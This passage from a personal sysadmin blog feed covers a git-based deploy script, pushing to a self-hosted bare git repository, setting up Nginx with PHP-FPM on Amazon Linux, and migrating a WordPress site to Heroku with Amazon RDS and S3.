<span class="nb">echo</span> <span class="s2">"LIVE_PATH=</span><span class="nv">$LIVE_PATH</span><span class="s2">"</span>
<span class="nb">mkdir</span> <span class="nt">-p</span> <span class="nv">$VERSION_PATH</span>
<span class="nb">mkdir</span> <span class="nt">-p</span> <span class="nv">$VERSION_PATH</span>/sources
git <span class="nt">--work-tree</span><span class="o">=</span><span class="nv">$VERSION_PATH</span> <span class="nt">--git-dir</span><span class="o">=</span><span class="nv">$REPO_PATH</span> checkout <span class="nt">-f</span> <span class="nv">$DEPLOY_BRANCH</span>
<span class="c"># Remove git files</span>
<span class="nb">rm</span> <span class="nt">-rf</span> <span class="nv">$VERSION_PATH</span>/.git
<span class="nb">rm</span> <span class="nt">-rf</span> <span class="nv">$LIVE_PATH</span>
<span class="nb">ln</span> <span class="nt">-s</span> <span class="nv">$VERSION_PATH</span> <span class="nv">$LIVE_PATH</span>
<span class="c"># Delete old folder keeping the 3 most recent ones, which aren't the current live one, / (root, security measure, different from your source folder)</span>
<span class="nb">rm</span> <span class="nt">-rf</span> <span class="k">$(</span><span class="nb">ls</span> <span class="nt">-1dt</span> <span class="k">$(</span>find <span class="nt">-L</span> <span class="nv">$DEPLOY_PATH</span>/sources/ <span class="nt">-maxdepth</span> 1 <span class="nt">-type</span> d <span class="o">!</span> <span class="nt">-samefile</span> / <span class="o">!</span> <span class="nt">-samefile</span> <span class="nv">$DEPLOY_PATH</span>/sources/ <span class="o">!</span> <span class="nt">-samefile</span> <span class="nv">$LIVE_PATH</span> <span class="nt">-print</span><span class="k">)</span> | <span class="nb">tail</span> <span class="nt">-n</span>+3<span class="k">)</span>
<span class="k">fi
done</span></code></pre></figure>
<p>If you have any question, let me know.
Matheus</p>
Pushing to your own remote git2016-12-08T00:00:00-06:00http://www.matbra.com/2016/12/08/pushing-to-your-own-remote-git<p>I’m creating a new server as you can notice and I would like to push directly to my git (hosted on my own server), so I could release a new version with a simple <code class="highlighter-rouge">git push myserver branch</code>.</p>
<p>If you want to achieve this as well you can connect to your remote ssh and execute</p>
<ol>
<li><code class="highlighter-rouge">$ mkdir test.git</code></li>
<li><code class="highlighter-rouge">$ cd git</code></li>
<li><code class="highlighter-rouge">$ git --bare init</code></li>
</ol>
<p>You will need to know the full path of your git folder to add to as a remote on your local, to check the full path run <code class="highlighter-rouge">pwd</code>. Back to your local machine add your remote server.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git remote add my_server ssh://user@ip:/replace/with/pwd/test.git
</code></pre></div></div>
<p>After this you can use <code class="highlighter-rouge">git push my_server branch</code> to push to it.</p>
<p>Matheus</p>
Install Nginx, PHP on Amazon Linux2016-12-07T00:00:00-06:00http://www.matbra.com/2016/12/07/install-nginx-php-on-amazon-linux<p>I’m migrating my blog and a few other stuff I have running to Amazon infrastructure. I needed an Amazon EC2 instance with PHP support and able to connect to a MySQL.</p>
<h3 id="steps">Steps:</h3>
<ol>
<li><code class="highlighter-rouge">yum update</code></li>
<li><code class="highlighter-rouge">yum install nginx</code></li>
<li><code class="highlighter-rouge">yum install php70 php70-fpm php70-mysqlnd</code></li>
<li>Edit /etc/nginx/conf.d/virtual.conf</li>
</ol>
<figure class="highlight"><pre><code class="language-nginx" data-lang="nginx"><span class="k">server</span> <span class="p">{</span>
<span class="kn">listen</span> <span class="mi">3000</span><span class="p">;</span>
<span class="kn">location</span> <span class="n">/</span> <span class="p">{</span>
<span class="kn">root</span> <span class="n">/var/www/</span><span class="p">;</span>
<span class="kn">index</span> <span class="s">index.php</span> <span class="s">index.html</span> <span class="s">index.htm</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">\.php$</span> <span class="p">{</span>
<span class="kn">root</span> <span class="n">/var/www/</span><span class="p">;</span>
<span class="kn">fastcgi_pass</span> <span class="s">unix:/var/run/php-fpm/php-fpm.sock</span><span class="p">;</span>
<span class="kn">fastcgi_index</span> <span class="s">index.php</span><span class="p">;</span>
<span class="kn">fastcgi_param</span> <span class="s">SCRIPT_FILENAME</span> <span class="nv">$document_root$fastcgi_script_name</span><span class="p">;</span>
<span class="kn">include</span> <span class="s">fastcgi_params</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<ol>
<li>Edit the following properties of: /etc/php-fpm-7.0.d/www.conf</li>
</ol>
<figure class="highlight"><pre><code class="language-nginx" data-lang="nginx"><span class="k">user</span> <span class="p">=</span> <span class="s">nginx</span>
<span class="s">group</span> <span class="p">=</span> <span class="s">nginx</span>
<span class="s">listen</span> <span class="p">=</span> <span class="n">/var/run/php-fpm/php-fpm.sock</span>
<span class="s">listen.owner</span> <span class="p">=</span> <span class="s">nginx</span>
<span class="s">listen.group</span> <span class="p">=</span> <span class="s">nginx</span>
<span class="s">listen.mode</span> <span class="p">=</span> <span class="mi">0660</span></code></pre></figure>
<ol>
<li>Create a php file on /var/www/</li>
</ol>
<figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp"><?php</span>
<span class="nb">phpinfo</span><span class="p">();</span>
<span class="cp">?></span></code></pre></figure>
<ol>
<li>Access http://SERVER_IP:3000</li>
</ol>
<p>You will need your security group for your ec2 instance to have port 3000 opened.</p>
<p>If you want to add them to auto start:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo chkconfig nginx on
sudo chkconfig php-fpm on
</code></pre></div></div>
<p>If you want to restart this services:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo service nginx restart
sudo service php-fpm restart
</code></pre></div></div>
<p>Matheus</p>
Migrate old Wordpress to Heroku, Amazon RDS and S3.2016-12-03T00:00:00-06:00http://www.matbra.com/2016/12/03/migrate-old-wordpress-to-heroku-s3-rds<p>After a few good years with my blog out of date, I decided to start to write again and to migrate it to Heroku since his server was with a really old stack. I decided to use Heroku, Amazon RDS as Database service and S3 as file storage (for uploaded files)</p>
<h3 id="steps">Steps:</h3>
<ol>
<li>Disable all Wordpress’ extensions</li>
<li>Do a full backup (Wordpress, Database, Uploads, etc)</li>
<li>Really, do a backup!</li>
<li>Create a git repository</li>
<li>Add Wordpress code to your git
<ol>
<li>If you want to update your Wordpress add <a href="https://wordpress.org/download/">latest Wordpress version</a>
<ol>
<li><strong>Don’t add your private configs (wp-config.php)!</strong></li>
<li>Don’t add <strong>uploads</strong> folder</li>
<li>Add your plugins</li>
<li>Add your theme</li>
</ol>
</li>
<li>If you want to keep your Wordpress version, add your current blog’s code
<ol>
<li><strong>Don’t add your private configs (wp-config.php)!</strong></li>
<li>Don’t add <strong>uploads</strong> folder</li>
</ol>
</li>
</ol>
</li>
<li>Atention with your private files!!</li>
<li>Update your wp-config
<ol>
<li>All your <strong>private</strong> configs must use getenv, this function will be responsible to fetch the values from env vars.</li>
</ol>
</li>
</ol>
<figure class="highlight"><pre><code class="language-php" data-lang="php"> <span class="cp"><?php</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'AUTH_KEY'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'WP_AUTH_KEY'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'SECURE_AUTH_KEY'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'WP_SECURE_AUTH_KEY'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'LOGGED_IN_KEY'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'WP_LOGGED_IN_KEY'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'NONCE_KEY'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'WP_NONCE_KEY'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'AUTH_SALT'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'WP_AUTH_SALT'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'SECURE_AUTH_SALT'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'WP_SECURE_AUTH_SALT'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'LOGGED_IN_SALT'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'WP_LOGGED_IN_SALT'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'NONCE_SALT'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'WP_NONCE_SALT'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'S3_UPLOADS_BUCKET'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'AWS_S3_BUCKET'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'S3_UPLOADS_KEY'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'AWS_S3_KEY'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'S3_UPLOADS_SECRET'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'AWS_S3_SECRET'</span><span class="p">));</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'S3_UPLOADS_REGION'</span><span class="p">,</span> <span class="nb">getenv</span><span class="p">(</span><span class="s1">'AWS_S3_REGION'</span><span class="p">));</span>
</code></pre></figure>
<ol>
<li>Create a composer.json file to define requirements and packages versions
<ol>
<li>Exemple composer.json</li>
</ol>
</li>
</ol>
<figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="w"> </span><span class="p">{</span><span class="w">
</span><span class="s2">"require"</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
</span><span class="s2">"php"</span><span class="p">:</span><span class="w"> </span><span class="s2">">=7.0.0"</span><span class="w">
</span><span class="p">},</span><span class="w">
</span><span class="s2">"require-dev"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
</span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></figure>
<ol>
<li>Execute <code class="highlighter-rouge">composer update</code> to generate the composer.lock file</li>
<li>Update your .htaccess file to redirect your uploads to your S3 bucket
<ol>
<li>Update the url (at the 5th line) on the .htaccess to match your S3 and Bucket</li>
</ol>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code><IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteRule ^wp-content/uploads/(.*)$ https://s3-us-west-2.amazonaws.com/BUCKET/uploads/$1 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
</code></pre></div> </div>
</li>
<li>Do a commit with all this files (don’t add your secrets/keys to your git)</li>
<li><a href="https://aws.amazon.com/getting-started/">Amazon setup</a>
<ol>
<li>Create a RDS Database</li>
<li>Import your backup into it</li>
<li>Send your S3 files to S3
<ol>
<li>Remember to import/change the permissions of your s3 files so guest users can access your uploaded files</li>
</ol>
</li>
</ol>
</li>
<li><a href="https://devcenter.heroku.com/articles/getting-started-with-php#introduction">Heroku setup</a>
<ol>
<li>Add your environment vars on heroku with the correct values and names which you used on <code class="highlighter-rouge">wp-config.php</code>, remember to use the RDS ones for database.</li>
<li><a href="https://devcenter.heroku.com/articles/custom-domains">Update your DNS for Heroku</a></li>
<li>Send your code to Heroku using the repository you have created</li>
</ol>
</li>
<li>Access your website</li>
</ol>
<p>If you’re updating your Wordpress, there are chances to something go wrong or to some plugin to stop working with the new Wordpress version, so don’t forget to check and update them.</p>
<p>Also, if you have any other question or need more information a specific test, let me know. I can try to help.</p>
<p>Matheus</p>